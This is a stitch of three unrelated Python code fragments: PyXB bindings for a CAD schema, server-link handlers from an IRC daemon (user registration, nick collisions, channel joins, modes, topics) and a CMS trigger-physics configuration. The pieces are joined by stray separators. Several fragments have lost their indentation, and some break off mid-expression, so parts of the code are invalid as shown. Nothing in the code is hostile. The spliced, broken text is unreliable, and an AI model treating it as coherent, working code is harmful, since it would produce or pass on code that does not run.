    __AlignmentAxis._UseLocation = pyxb.utils.utility.Location(u'avm.cad.xsd', 251, 8)
    AlignmentAxis = property(__AlignmentAxis.value, __AlignmentAxis.set, None, None)
    # Attribute RotationLimitReference uses Python identifier RotationLimitReference (optional anyURI)
    __RotationLimitReference = pyxb.binding.content.AttributeUse(pyxb.namespace.ExpandedName(None, u'RotationLimitReference'), 'RotationLimitReference', '__cad_RevoluteJointSpec__RotationLimitReference', pyxb.binding.datatypes.anyURI)
    __RotationLimitReference._DeclarationLocation = pyxb.utils.utility.Location(u'avm.cad.xsd', 252, 8)
    __RotationLimitReference._UseLocation = pyxb.utils.utility.Location(u'avm.cad.xsd', 252, 8)
    RotationLimitReference = property(__RotationLimitReference.value, __RotationLimitReference.set, None, None)
    _ElementMap.update({
        __MinimumRotation.name() : __MinimumRotation,
        __DefaultRotation.name() : __DefaultRotation,
        __MaximumRotation.name() : __MaximumRotation
    })
    _AttributeMap.update({
        __AlignmentPlane.name() : __AlignmentPlane,
        __AlignmentAxis.name() : __AlignmentAxis,
        __RotationLimitReference.name() : __RotationLimitReference
    })
Namespace.addCategoryObject('typeBinding', u'RevoluteJointSpec', RevoluteJointSpec_)
# Complex type {cad}TranslationalJointSpec with content type ELEMENT_ONLY
# NOTE: PyXB-generated binding class; regenerate from avm.cad.xsd rather than editing by hand.
class TranslationalJointSpec_ (KinematicJointSpec_):
    """Complex type {cad}TranslationalJointSpec with content type ELEMENT_ONLY"""
    _TypeDefinition = None
    _ContentTypeTag = pyxb.binding.basis.complexTypeDefinition._CT_ELEMENT_ONLY
    _Abstract = False
    _ExpandedName = pyxb.namespace.ExpandedName(Namespace, u'TranslationalJointSpec')
    _XSDLocation = pyxb.utils.utility.Location(u'avm.cad.xsd', 256, 2)
    _ElementMap = KinematicJointSpec_._ElementMap.copy()
    _AttributeMap = KinematicJointSpec_._AttributeMap.copy()
    # Base type is KinematicJointSpec_
    # Translation limit elements (Minimum/Default/Maximum)
    # Element MinimumTranslation uses Python identifier MinimumTranslation
    __MinimumTranslation = pyxb.binding.content.ElementDeclaration(pyxb.namespace.ExpandedName(None, u'MinimumTranslation'), 'MinimumTranslation', '__cad_TranslationalJointSpec__MinimumTranslation', False, pyxb.utils.utility.Location(u'avm.cad.xsd', 260, 10), )
    MinimumTranslation = property(__MinimumTranslation.value, __MinimumTranslation.set, None, None)
    # Element DefaultTranslation uses Python identifier DefaultTranslation
    __DefaultTranslation = pyxb.binding.content.ElementDeclaration(pyxb.namespace.ExpandedName(None, u'DefaultTranslation'), 'DefaultTranslation', '__cad_TranslationalJointSpec__DefaultTranslation', False, pyxb.utils.utility.Location(u'avm.cad.xsd', 261, 10), )
    DefaultTranslation = property(__DefaultTranslation.value, __DefaultTranslation.set, None, None)
    # Element MaximumTranslation uses Python identifier MaximumTranslation
    __MaximumTranslation = pyxb.binding.content.ElementDeclaration(pyxb.namespace.ExpandedName(None, u'MaximumTranslation'), 'MaximumTranslation', '__cad_TranslationalJointSpec__MaximumTranslation', False, pyxb.utils.utility.Location(u'avm.cad.xsd', 262, 10), )
    MaximumTranslation = property(__MaximumTranslation.value, __MaximumTranslation.set, None, None)
    # Attribute AlignmentPlane uses Python identifier AlignmentPlane (required anyURI)
    __AlignmentPlane = pyxb.binding.content.AttributeUse(pyxb.namespace.ExpandedName(None, u'AlignmentPlane'), 'AlignmentPlane', '__cad_TranslationalJointSpec__AlignmentPlane', pyxb.binding.datatypes.anyURI, required=True)
    __AlignmentPlane._DeclarationLocation = pyxb.utils.utility.Location(u'avm.cad.xsd', 264, 8)
    __AlignmentPlane._UseLocation = pyxb.utils.utility.Location(u'avm.cad.xsd', 264, 8)
    AlignmentPlane = property(__AlignmentPlane.value, __AlignmentPlane.set, None, None)
    # Attribute AlignmentAxis uses Python identifier AlignmentAxis (required anyURI)
    __AlignmentAxis = pyxb.binding.content.AttributeUse(pyxb.namespace.ExpandedName(None, u'AlignmentAxis'), 'AlignmentAxis', '__cad_TranslationalJointSpec__AlignmentAxis', pyxb.binding.datatypes.anyURI, required=True)
    __AlignmentAxis._DeclarationLocation = pyxb.utils.utility.Location(u'avm.cad.xsd', 265, 8)
    __AlignmentAxis._UseLocation = pyxb.utils.utility.Location(u'avm.cad.xsd', 265, 8)
    AlignmentAxis = property(__AlignmentAxis.value, __AlignmentAxis.set, None, None)
    # Attribute TranslationLimitReference uses Python identifier TranslationLimitReference (optional anyURI)
    __TranslationLimitReference = pyxb.binding.content.AttributeUse(pyxb.namespace.ExpandedName(None, u'TranslationLimitReference'), 'TranslationLimitReference', '__cad_TranslationalJointSpec__TranslationLimitReference', pyxb.binding.datatypes.anyURI)
    __TranslationLimitReference._DeclarationLocation = pyxb.utils.utility.Location(u'avm.cad.xsd', 266, 8)
    __TranslationLimitReference._UseLocation = pyxb.utils.utility.Location(u'avm.cad.xsd', 266, 8)
    TranslationLimitReference = property(__TranslationLimitReference.value, __TranslationLimitReference.set, None, None)
    _ElementMap.update({
        __MinimumTranslation.name() : __MinimumTranslation,
        __DefaultTranslation.name() : __DefaultTranslation,
        __MaximumTranslation.name() : __MaximumTranslation
    })
    _AttributeMap.update({
        __AlignmentPlane.name() : __AlignmentPlane,
        __AlignmentAxis.name() : __AlignmentAxis,
        __TranslationLimitReference.name() : __TranslationLimitReference
    })
Namespace.addCategoryObject('typeBinding', u'TranslationalJointSpec', TranslationalJointSpec_)
# Complex type {cad}Circle with content type ELEMENT_ONLY
# NOTE: PyXB-generated binding class; regenerate from avm.cad.xsd rather than editing by hand.
class Circle_ (Geometry2D_):
    """Complex type {cad}Circle with content type ELEMENT_ONLY"""
    _TypeDefinition = None
    _ContentTypeTag = pyxb.binding.basis.complexTypeDefinition._CT_ELEMENT_ONLY
    _Abstract = False
    _ExpandedName = pyxb.namespace.ExpandedName(Namespace, u'Circle')
    _XSDLocation = pyxb.utils.utility.Location(u'avm.cad.xsd', 116, 2)
    _ElementMap = Geometry2D_._ElementMap.copy()
    _AttributeMap = Geometry2D_._AttributeMap.copy()
    # Base type is Geometry2D_
    # Element CircleCenter uses Python identifier CircleCenter
    __CircleCenter = pyxb.binding.content.ElementDeclaration(pyxb.namespace.ExpandedName(None, u'CircleCenter'), 'CircleCenter', '__cad_Circle__CircleCenter', False, pyxb.utils.utility.Location(u'avm.cad.xsd', 120, 10), )
    CircleCenter = property(__CircleCenter.value, __CircleCenter.set, None, None)
    # Element CircleEdge uses Python identifier CircleEdge
    __CircleEdge = pyxb.binding.content.ElementDeclaration(pyxb.namespace.ExpandedName(None, u'CircleEdge'), 'CircleEdge', '__cad_Circle__CircleEdge', True, pyxb.utils.utility.Location(u'avm.cad.xsd', 121, 10), )
    CircleEdge = property(__CircleEdge.value, __CircleEdge.set, None, None)
    # Attribute GeometryQualifier inherited from {cad}Geometry
    # Attribute PartIntersectionModifier inherited from {cad}Geometry
    _ElementMap.update({
        __CircleCenter.name() : __CircleCenter,
        __CircleEdge.name() : __CircleEdge
    })
    _AttributeMap.update({
    })
Namespace.addCategoryObject('typeBinding', u'Circle', Circle_)
# Complex type {cad}Polygon with content type ELEMENT_ONLY
class Polygon_ (Geometry2D_):
"""Complex type {cad}Polygon with content type ELEMENT_ONLY"""
_TypeDefinition = None
_ContentTypeTag = pyxb.binding.basis.complexTypeDefinition._CT_ELEMENT_ONLY
_Abstract = False
_ExpandedName = pyxb.namespace.ExpandedName(Namespace, u'Polygon')
_XSDLocation = pyxb.utils.utility.Location(u'avm.cad.xsd', 126, 2)
_ElementMap = Geometry2D_._ElementMap.copy()
_AttributeMap = Geometry2D_._AttributeMap.copy()
# Base type is Geometry2D_
# Element PolygonPoint uses Python identifier PolygonPoint
__PolygonPoint = pyxb.binding.content.ElementDeclaration(pyxb.namespace.ExpandedName(None, u'PolygonPoint'), 'PolygonPoint', '__cad_Polygon__PolygonPoint', True, pyxb.utils.utility.Location(u'avm.cad.xsd', 130, 10), )
PolygonPoint = property(__PolygonPoint.value, | |
1
self.ircd.userid[uuid] = newUser
for remoteserver in self.ircd.servers.itervalues():
if remoteserver.nearHop == self.ircd.name and remoteserver != self:
remoteserver.callRemote(ConnectUser, uuid=uuid, ip=ip, server=server, secure=secure, signon=signon)
return {}
ConnectUser.responder(basicConnectUser)
def addUser(self, uuid, nick, ident, host, realhost, gecos, ip, password, server, secure, signon, nickts):
    """
    Register a user introduced by a remote server.

    Resolves nick collisions against any local user already holding the
    nick (earlier nick timestamp wins; ties fall back to signon time; a
    full tie drops both users), records the user, runs connect hooks, and
    propagates RegisterUser to every other directly linked server.

    Raises HandshakeNotYetComplete, NoSuchServer or UserAlreadyConnected
    on protocol violations.
    """
    if not self.name:
        raise HandshakeNotYetComplete ("The initial handshake has not occurred over this link.")
    if server not in self.ircd.servers:
        raise NoSuchServer ("The server {} is not connected to the network.".format(server))
    self.ignoreUsers.discard(uuid) # very unlikely, but if a user is being introduced reusing a UUID, remove from ignored
    # A uuid may already be known without a nickname (partially connected);
    # reuse that record.  A uuid that already has a nickname is a duplicate.
    oldUser = None
    if uuid in self.ircd.userid:
        oldUser = self.ircd.userid[uuid]
        if oldUser.nickname:
            raise UserAlreadyConnected ("The uuid {} already exists on the network.".format(uuid))
    signontime = datetime.utcfromtimestamp(signon)
    nicktime = datetime.utcfromtimestamp(nickts)
    if nick in self.ircd.users:
        # Nick collision resolution against the existing holder of the nick.
        udata = self.ircd.users[nick]
        if nicktime < udata.nicktime:
            udata.disconnect("Nickname collision", self.name)  # incoming user wins
        elif nicktime == udata.nicktime:
            if signontime < udata.signon:
                udata.disconnect("Nickname collision", self.name)  # incoming user wins on signon time
            elif signontime == udata.signon:
                # exact tie: drop the existing user AND ignore the incoming one
                udata.disconnect("Nickname collision", self.name)
                self.ignoreUsers.add(uuid)
                if oldUser:
                    del self.ircd.userid[uuid]
                return {}
            else:
                # existing user signed on earlier: ignore the incoming user
                self.ignoreUsers.add(uuid)
                if oldUser:
                    del self.ircd.userid[uuid]
                return {}
        else:
            # existing user held the nick earlier: ignore the incoming user
            self.ignoreUsers.add(uuid)
            if oldUser:
                del self.ircd.userid[uuid]
            return {}
    if oldUser:
        # complete the registration of the partially connected user in place
        newUser = oldUser
        newUser.nickname = nick
        newUser.username = ident
        newUser.hostname = host
        newUser.realhost = realhost
        newUser.realname = gecos
        newUser.password = password if password else None
        newUser.nicktime = nicktime
        newUser.metadata = oldUser.metadata
        newUser.cache = oldUser.cache
        newUser.registered = 0
    else:
        newUser = RemoteUser(self.ircd, uuid, nick, ident, host, realhost, gecos, ip, password if password else None, server, secure, signontime, nicktime)
    self.ircd.users[nick] = newUser
    self.ircd.userid[uuid] = newUser
    newUser.callConnectHooks()
    # propagate the registration to our other directly connected servers
    for linkedServer in self.ircd.servers.itervalues():
        if linkedServer.nearHop == self.ircd.name and linkedServer != self:
            linkedServer.callRemote(RegisterUser, uuid=uuid, nick=nick, ident=ident, host=host, realhost=realhost, gecos=gecos, ip=ip, password=password, server=server, secure=secure, signon=signon, nickts=nickts)
    return {}
RegisterUser.responder(addUser)
def removeUser(self, user, reason):
    """Disconnect the given user (by UUID) on behalf of the remote server."""
    if not self.name:
        raise HandshakeNotYetComplete ("The initial handshake has not occurred over this link.")
    try:
        target = self.ircd.userid[user]
    except KeyError:
        raise NoSuchUser ("The user {} is not on the network.".format(user))
    target.disconnect(reason, self.name)
    return {}
RemoveUser.responder(removeUser)
def setIdent(self, user, ident):
    """Apply a remote ident (username) change to our copy of the user."""
    if not self.name:
        raise HandshakeNotYetComplete ("The initial handshake has not occurred over this link.")
    try:
        udata = self.ircd.userid[user]
    except KeyError:
        raise NoSuchUser ("The user {} is not on the network.".format(user))
    udata.setUsername(ident, self.name)
    return {}
SetIdent.responder(setIdent)
def setHost(self, user, host):
    """Apply a remote displayed-host change to our copy of the user."""
    if not self.name:
        raise HandshakeNotYetComplete ("The initial handshake has not occurred over this link.")
    try:
        udata = self.ircd.userid[user]
    except KeyError:
        raise NoSuchUser ("The user {} is not on the network.".format(user))
    udata.setHostname(host, self.name)
    return {}
SetHost.responder(setHost)
def setName(self, user, gecos):
    """Apply a remote realname (gecos) change to our copy of the user."""
    if not self.name:
        raise HandshakeNotYetComplete ("The initial handshake has not occurred over this link.")
    try:
        udata = self.ircd.userid[user]
    except KeyError:
        raise NoSuchUser ("The user {} is not on the network.".format(user))
    udata.setRealname(gecos, self.name)
    return {}
SetName.responder(setName)
def requestJoin(self, channel, user):
    """Join the given user to the named channel, creating the channel if it does not yet exist."""
    if not self.name:
        raise HandshakeNotYetComplete ("The initial handshake has not occurred over this link.")
    if user not in self.ircd.userid:
        raise NoSuchUser ("The given user is not connected to the network.")
    existing = self.ircd.channels.get(channel)
    cdata = existing if existing is not None else IRCChannel(self.ircd, channel)
    self.ircd.userid[user].join(cdata)
    return {}
RequestJoinChannel.responder(requestJoin)
def joinChannel(self, channel, user, chants):
    """
    Handle a channel join propagated from a remote server.

    Merges channel state by creation timestamp: if the remote channel is
    older, local modes, statuses and topic are cleared to match; if the
    channel is new locally it is created.  The join is then announced to
    local members (via joinmessage hooks) and propagated onward to the
    other directly linked servers.
    """
    if not self.name:
        raise HandshakeNotYetComplete ("The initial handshake has not occurred over this link.")
    if user in self.ignoreUsers:
        # user lost a collision earlier; silently drop its events
        return {}
    if user not in self.ircd.userid:
        raise NoSuchUser ("The user {} is not connected to the network.".format(user))
    udata = self.ircd.userid[user]
    if channel in self.ircd.channels:
        cdata = self.ircd.channels[channel]
        for server in self.ircd.servers.itervalues(): # Propagate first so the chancreate hook can't screw things up (if being created)
            if server.nearHop == self.ircd.name and server != self:
                server.callRemote(JoinChannel, channel=cdata.name, chants=epoch(cdata.created), user=udata.uuid)
        chantime = datetime.utcfromtimestamp(chants)
        if chantime < cdata.created:
            # The remote channel is older, so it wins: adopt its creation
            # time and reset our modes, member statuses and topic.
            cdata.created = chantime
            # collect every currently set mode (with parameters) so the
            # removal can be announced to local members below
            modes = []
            params = []
            for mode, param in cdata.mode.iteritems():
                modetype = self.ircd.channel_mode_type[mode]
                if modetype == 0:
                    # list mode: one entry per list item
                    for item in param:
                        modes.append(mode)
                        params.append(item)
                elif modetype == 3:
                    # parameterless mode
                    modes.append(mode)
                else:
                    modes.append(mode)
                    params.append(param)
            # strip channel status (op/voice/...) from every member too
            for u, status in cdata.users.iteritems():
                for mode in status:
                    modes.append(mode)
                    params.append(u.nickname)
                cdata.users[u] = ""
            cdata.topic = ""
            cdata.topicSetter = self.ircd.name
            cdata.topicTime = cdata.created
            # only local users need the MODE/TOPIC notifications
            for u in cdata.users.iterkeys():
                if u.server == self.ircd.name:
                    u.sendMessage("MODE", "-{}".format("".join(modes)), " ".join(params), to=cdata.name)
                    u.sendMessage("TOPIC", ":", to=cdata.name)
    else:
        # first time we hear of this channel: create it with the remote timestamp
        cdata = IRCChannel(self.ircd, channel)
        cdata.created = datetime.utcfromtimestamp(chants)
        cdata.topicTime = cdata.created
        for server in self.ircd.servers.itervalues(): # Propagate first so the chancreate hook can't screw things up (if being created)
            if server.nearHop == self.ircd.name and server != self:
                server.callRemote(JoinChannel, channel=cdata.name, chants=epoch(cdata.created), user=udata.uuid)
        self.ircd.channels[channel] = cdata
        for action in self.ircd.actions["chancreate"]:
            action(cdata)
    if udata in cdata.users:
        # already a member; nothing more to do
        return {}
    cdata.users[udata] = ""
    # joinmessage hooks may filter/extend who sees the JOIN; hooks returning
    # "again" are re-run after all others have adjusted the list
    joinShowUsers = cdata.users.keys()
    tryagain = []
    for action in self.ircd.actions["joinmessage"]:
        result = action(cdata, udata, joinShowUsers)
        if result == "again":
            tryagain.append(action)
        else:
            joinShowUsers = result
    for action in tryagain:
        joinShowUsers = action(cdata, udata, joinShowUsers)
    for u in joinShowUsers:
        if u.server == self.ircd.name:
            u.sendMessage("JOIN", to=cdata.name, prefix=udata.prefix())
    # show the topic (or its absence) to the joining user if local
    if cdata.topic and udata.server == self.ircd.name:
        udata.sendMessage(irc.RPL_TOPIC, cdata.name, ":{}".format(cdata.topic))
        udata.sendMessage(irc.RPL_TOPICWHOTIME, cdata.name, cdata.topicSetter, str(epoch(cdata.topicTime)))
    elif udata.server == self.ircd.name:
        udata.sendMessage(irc.RPL_NOTOPIC, cdata.name, ":No topic is set")
    for action in self.ircd.actions["join"]:
        action(udata, cdata)
    return {}
JoinChannel.responder(joinChannel)
def leaveChannel(self, channel, user):
    """Remove the given user (by UUID) from the named channel on behalf of the remote server."""
    if not self.name:
        raise HandshakeNotYetComplete ("The initial handshake has not occurred over this link.")
    if user not in self.ircd.userid:
        raise NoSuchUser ("The given user is not connected to the network.")
    if channel not in self.ircd.channels:
        raise NoSuchChannel ("The given channel does not exist on the network.")
    udata = self.ircd.userid[user]
    cdata = self.ircd.channels[channel]
    udata.leave(cdata, self.name)
    return {}
LeaveChannel.responder(leaveChannel)
def requestMode(self, user, source, modestring, params):
    """Apply a remotely requested mode change to one of our users."""
    if not self.name:
        raise HandshakeNotYetComplete ("The initial handshake has not occurred over this link.")
    try:
        udata = self.ircd.userid[user]
    except KeyError:
        raise NoSuchUser ("The given user is not connected to the network.")
    udata.setMode(None, modestring, params, source)
    return {}
RequestSetMode.responder(requestMode)
def setMode(self, target, targetts, source, modestring, params):
    """Remote AMP command: apply an already-authorized mode change to a
    channel or user, echo it to local clients, and re-propagate it to the
    other directly-connected servers.

    target is either a channel name or a user UUID; targetts is the
    sender's creation timestamp for the target, used to discard changes
    based on a newer (losing) channel than the one we hold.
    """
    if not self.name:
        raise HandshakeNotYetComplete ("The initial handshake has not occurred over this link.")
    # Users being purged from this server's view: silently ack and drop.
    if target in self.ignoreUsers:
        return {}
    if target in self.ircd.channels:
        data = self.ircd.channels[target]
        targettype = "channel"
        # Remote channel is newer than ours -> its modes lose; ignore.
        if datetime.utcfromtimestamp(targetts) > data.created:
            return {}
    elif target in self.ircd.userid:
        data = self.ircd.userid[target]
        targettype = "user"
    else:
        raise NoSuchTarget ("The target {} does not exist on the network.".format(target))
    # Walk the modestring char by char, tracking +/- state and consuming
    # entries from params as each mode letter requires.
    adding = True
    currentParam = 0
    modeDisplay = []  # list of [adding, letter, param] actually applied
    for mode in modestring:
        if mode == "+":
            adding = True
            continue
        if mode == "-":
            adding = False
            continue
        if targettype == "channel":
            modetype = self.ircd.channel_mode_type[mode]
        else:
            modetype = self.ircd.user_mode_type[mode]
        # Parameter consumption by mode category (numbering appears to be:
        # -1 status/prefix, 0 list, 1 always-param, 2 param-on-set,
        # others no param — TODO confirm against the mode tables):
        if modetype == -1 or (modetype == 0 and len(params) > currentParam) or modetype == 1 or (adding and modetype == 2):
            param = params[currentParam]
            currentParam += 1
        else:
            param = None
        if modetype == -1:
            # Status mode: param is a nick; skip unknown users.
            if param not in self.ircd.users:
                continue
            udata = self.ircd.users[param]
            if adding:
                # Insert the new status keeping the string ordered by
                # prefix rank (self.ircd.prefixes[x][1]), highest first.
                status = data.users[udata]
                statusList = list(status)
                for index, statusLevel in enumerate(status):
                    if self.ircd.prefixes[statusLevel][1] < self.ircd.prefixes[mode][1]:
                        statusList.insert(index, mode)
                        break
                if mode not in statusList:
                    statusList.append(mode)
                data.users[udata] = "".join(statusList)
                modeDisplay.append([True, mode, param])
            else:
                if mode in data.users[udata]:
                    data.users[udata] = data.users[udata].replace(mode, "")
                    modeDisplay.append([False, mode, param])
        elif modetype == 0:
            # List mode: maintain a list of params under the letter.
            if adding:
                if mode not in data.mode:
                    data.mode[mode] = []
                data.mode[mode].append(param)
                modeDisplay.append([True, mode, param])
            else:
                data.mode[mode].remove(param)
                modeDisplay.append([False, mode, param])
                if not data.mode[mode]:
                    del data.mode[mode]
        else:
            # Simple mode: single (possibly None) value per letter.
            if adding:
                data.mode[mode] = param
            else:
                del data.mode[mode]
            modeDisplay.append([adding, mode, param])
    if modeDisplay:
        # Rebuild a canonical "+ab-c param ..." line from what actually
        # changed, emitting +/- only when the direction flips.
        adding = None
        modestr = []
        showParams = []
        for mode in modeDisplay:
            if mode[0] and adding is not True:
                adding = True
                modestr.append("+")
            elif not mode[0] and adding is not False:
                adding = False
                modestr.append("-")
            modestr.append(mode[1])
            if mode[2]:
                showParams.append(mode[2])
        modeLine = "{} {}".format("".join(modestr), " ".join(showParams)) if showParams else "".join(modestr)
        if targettype == "user":
            data.sendMessage("MODE", modeLine, prefix=source)
        else:
            for u in data.users:
                u.sendMessage("MODE", modeLine, to=data.name, prefix=source)
        # Re-broadcast to our other directly-linked servers (not back to
        # the link the change arrived on).
        for server in self.ircd.servers.itervalues():
            if server.nearHop == self.ircd.name and server != self:
                server.callRemote(SetMode, target=target, targetts=targetts, source=source, modestring="".join(modestr), params=showParams)
    return {}
SetMode.responder(setMode)
def setTopic(self, channel, chants, topic, topicsetter, topicts):
if not self.name:
raise HandshakeNotYetComplete ("The initial handshake has not occurred over this link.")
if channel not in self.ircd.channels:
raise NoSuchChannel ("The channel {} does not exist on this network.".format(channel))
cdata = self.ircd.channels[channel]
chantime = datetime.utcfromtimestamp(chants)
if cdata.created < chantime:
return {} # Ignore the change
topictime = datetime.utcfromtimestamp(topicts)
if chantime < cdata.created or topictime > cdata.topicTime or (topictime == cdata.topicTime and not self.localOrigin):
for action in self.ircd.actions["topic"]:
action(cdata, topic, topicsetter)
cdata.topic = topic
cdata.topicSetter = topicsetter
cdata.topicTime = topictime
| |
cms.double(0.9),
NTOT = cms.int32(1),
jetsInput = cms.InputTag("hltAK4PFJets"),
maxCF = cms.double(99.0),
maxEta = cms.double(1e+99),
minPt = cms.double(20.0)
)
# Apply the hltAK4PFCorrector chain to jets passing the tight-ID selection.
process.hltAK4PFJetsTightIDCorrected = cms.EDProducer("CorrectedPFJetProducer",
    correctors = cms.VInputTag("hltAK4PFCorrector"),
    src = cms.InputTag("hltAK4PFJetsTightID")
)
# L2Relative jet-energy-correction level for the 'AK4PFHLT' algorithm.
process.hltAK4PFRelativeCorrector = cms.EDProducer("LXXXCorrectorProducer",
    algorithm = cms.string('AK4PFHLT'),
    level = cms.string('L2Relative')
)
# L2L3Residual jet-energy-correction level for the 'AK4PFHLT' algorithm.
process.hltAK4PFResidualCorrector = cms.EDProducer("LXXXCorrectorProducer",
    algorithm = cms.string('AK4PFHLT'),
    level = cms.string('L2L3Residual')
)
# Unpack raw Level-1 stage-2 calorimeter trigger data (FEDs 1360, 1366).
process.hltCaloStage2Digis = cms.EDProducer("L1TRawToDigi",
    CTP7 = cms.untracked.bool(False),
    FWId = cms.uint32(0),
    FWOverride = cms.bool(False),
    FedIds = cms.vint32(1360, 1366),
    InputLabel = cms.InputTag("rawDataCollector"),
    MTF7 = cms.untracked.bool(False),
    MinFeds = cms.uint32(0),
    Setup = cms.string('stage2::CaloSetup'),
    debug = cms.untracked.bool(False),
    lenAMC13Header = cms.untracked.int32(8),
    lenAMC13Trailer = cms.untracked.int32(8),
    lenAMCHeader = cms.untracked.int32(8),
    lenAMCTrailer = cms.untracked.int32(0),
    lenSlinkHeader = cms.untracked.int32(8),
    lenSlinkTrailer = cms.untracked.int32(8)
)
# CSVv2 b-tag discriminator from IP + inclusive-SV tag infos (calo jets).
process.hltCombinedSecondaryVertexBJetTagsCalo = cms.EDProducer("JetTagProducer",
    jetTagComputer = cms.string('hltCombinedSecondaryVertexV2'),
    tagInfos = cms.VInputTag("hltImpactParameterTagInfos", "hltInclusiveSecondaryVertexFinderTagInfos")
)
# Build 2D rec hits from CSC strip/wire digis; per-chamber-type noise and
# cross-talk constants follow.
process.hltCsc2DRecHits = cms.EDProducer("CSCRecHitDProducer",
    CSCDebug = cms.untracked.bool(False),
    CSCNoOfTimeBinsForDynamicPedestal = cms.int32(2),
    CSCStripClusterChargeCut = cms.double(25.0),
    CSCStripClusterSize = cms.untracked.int32(3),
    CSCStripPeakThreshold = cms.double(10.0),
    CSCStripxtalksOffset = cms.double(0.03),
    CSCUseCalibrations = cms.bool(True),
    CSCUseGasGainCorrections = cms.bool(False),
    CSCUseStaticPedestals = cms.bool(False),
    CSCUseTimingCorrections = cms.bool(True),
    CSCWireClusterDeltaT = cms.int32(1),
    CSCstripWireDeltaTime = cms.int32(8),
    ConstSyst_ME12 = cms.double(0.0),
    ConstSyst_ME13 = cms.double(0.0),
    ConstSyst_ME1a = cms.double(0.022),
    ConstSyst_ME1b = cms.double(0.007),
    ConstSyst_ME21 = cms.double(0.0),
    ConstSyst_ME22 = cms.double(0.0),
    ConstSyst_ME31 = cms.double(0.0),
    ConstSyst_ME32 = cms.double(0.0),
    ConstSyst_ME41 = cms.double(0.0),
    NoiseLevel_ME12 = cms.double(9.0),
    NoiseLevel_ME13 = cms.double(8.0),
    NoiseLevel_ME1a = cms.double(7.0),
    NoiseLevel_ME1b = cms.double(8.0),
    NoiseLevel_ME21 = cms.double(9.0),
    NoiseLevel_ME22 = cms.double(9.0),
    NoiseLevel_ME31 = cms.double(9.0),
    NoiseLevel_ME32 = cms.double(9.0),
    NoiseLevel_ME41 = cms.double(9.0),
    UseAverageTime = cms.bool(False),
    UseFivePoleFit = cms.bool(True),
    UseParabolaFit = cms.bool(False),
    XTasymmetry_ME12 = cms.double(0.0),
    XTasymmetry_ME13 = cms.double(0.0),
    XTasymmetry_ME1a = cms.double(0.0),
    XTasymmetry_ME1b = cms.double(0.0),
    XTasymmetry_ME21 = cms.double(0.0),
    XTasymmetry_ME22 = cms.double(0.0),
    XTasymmetry_ME31 = cms.double(0.0),
    XTasymmetry_ME32 = cms.double(0.0),
    XTasymmetry_ME41 = cms.double(0.0),
    readBadChambers = cms.bool(True),
    readBadChannels = cms.bool(False),
    stripDigiTag = cms.InputTag("hltMuonCSCDigis","MuonCSCStripDigi"),
    wireDigiTag = cms.InputTag("hltMuonCSCDigis","MuonCSCWireDigi")
)
# Build CSC segments from the 2D rec hits using CSCSegAlgoST; the two
# nested PSets differ only in maxRecHitsInCluster (20 vs 24) and are mapped
# to chamber types via parameters_per_chamber_type.
process.hltCscSegments = cms.EDProducer("CSCSegmentProducer",
    algo_psets = cms.VPSet(cms.PSet(
        algo_name = cms.string('CSCSegAlgoST'),
        algo_psets = cms.VPSet(cms.PSet(
            BPMinImprovement = cms.double(10000.0),
            BrutePruning = cms.bool(True),
            CSCDebug = cms.untracked.bool(False),
            CorrectTheErrors = cms.bool(True),
            Covariance = cms.double(0.0),
            ForceCovariance = cms.bool(False),
            ForceCovarianceAll = cms.bool(False),
            NormChi2Cut2D = cms.double(20.0),
            NormChi2Cut3D = cms.double(10.0),
            Pruning = cms.bool(True),
            SeedBig = cms.double(0.0015),
            SeedSmall = cms.double(0.0002),
            curvePenalty = cms.double(2.0),
            curvePenaltyThreshold = cms.double(0.85),
            dPhiFineMax = cms.double(0.025),
            dRPhiFineMax = cms.double(8.0),
            dXclusBoxMax = cms.double(4.0),
            dYclusBoxMax = cms.double(8.0),
            hitDropLimit4Hits = cms.double(0.6),
            hitDropLimit5Hits = cms.double(0.8),
            hitDropLimit6Hits = cms.double(0.3333),
            maxDPhi = cms.double(999.0),
            maxDTheta = cms.double(999.0),
            maxRatioResidualPrune = cms.double(3.0),
            maxRecHitsInCluster = cms.int32(20),
            minHitsPerSegment = cms.int32(3),
            onlyBestSegment = cms.bool(False),
            preClustering = cms.bool(True),
            preClusteringUseChaining = cms.bool(True),
            prePrun = cms.bool(True),
            prePrunLimit = cms.double(3.17),
            tanPhiMax = cms.double(0.5),
            tanThetaMax = cms.double(1.2),
            useShowering = cms.bool(False),
            yweightPenalty = cms.double(1.5),
            yweightPenaltyThreshold = cms.double(1.0)
        ),
        cms.PSet(
            BPMinImprovement = cms.double(10000.0),
            BrutePruning = cms.bool(True),
            CSCDebug = cms.untracked.bool(False),
            CorrectTheErrors = cms.bool(True),
            Covariance = cms.double(0.0),
            ForceCovariance = cms.bool(False),
            ForceCovarianceAll = cms.bool(False),
            NormChi2Cut2D = cms.double(20.0),
            NormChi2Cut3D = cms.double(10.0),
            Pruning = cms.bool(True),
            SeedBig = cms.double(0.0015),
            SeedSmall = cms.double(0.0002),
            curvePenalty = cms.double(2.0),
            curvePenaltyThreshold = cms.double(0.85),
            dPhiFineMax = cms.double(0.025),
            dRPhiFineMax = cms.double(8.0),
            dXclusBoxMax = cms.double(4.0),
            dYclusBoxMax = cms.double(8.0),
            hitDropLimit4Hits = cms.double(0.6),
            hitDropLimit5Hits = cms.double(0.8),
            hitDropLimit6Hits = cms.double(0.3333),
            maxDPhi = cms.double(999.0),
            maxDTheta = cms.double(999.0),
            maxRatioResidualPrune = cms.double(3.0),
            maxRecHitsInCluster = cms.int32(24),
            minHitsPerSegment = cms.int32(3),
            onlyBestSegment = cms.bool(False),
            preClustering = cms.bool(True),
            preClusteringUseChaining = cms.bool(True),
            prePrun = cms.bool(True),
            prePrunLimit = cms.double(3.17),
            tanPhiMax = cms.double(0.5),
            tanThetaMax = cms.double(1.2),
            useShowering = cms.bool(False),
            yweightPenalty = cms.double(1.5),
            yweightPenaltyThreshold = cms.double(1.0)
        )),
        chamber_types = cms.vstring('ME1/a',
            'ME1/b',
            'ME1/2',
            'ME1/3',
            'ME2/1',
            'ME2/2',
            'ME3/1',
            'ME3/2',
            'ME4/1',
            'ME4/2'),
        parameters_per_chamber_type = cms.vint32(2, 1, 1, 1, 1,
            1, 1, 1, 1, 1)
    )),
    algo_type = cms.int32(1),
    inputObjects = cms.InputTag("hltCsc2DRecHits")
)
# Build 1D DT rec hits from DT digis with the linear-drift-from-DB algorithm.
process.hltDt1DRecHits = cms.EDProducer("DTRecHitProducer",
    debug = cms.untracked.bool(False),
    dtDigiLabel = cms.InputTag("hltMuonDTDigis"),
    recAlgo = cms.string('DTLinearDriftFromDBAlgo'),
    recAlgoConfig = cms.PSet(
        debug = cms.untracked.bool(False),
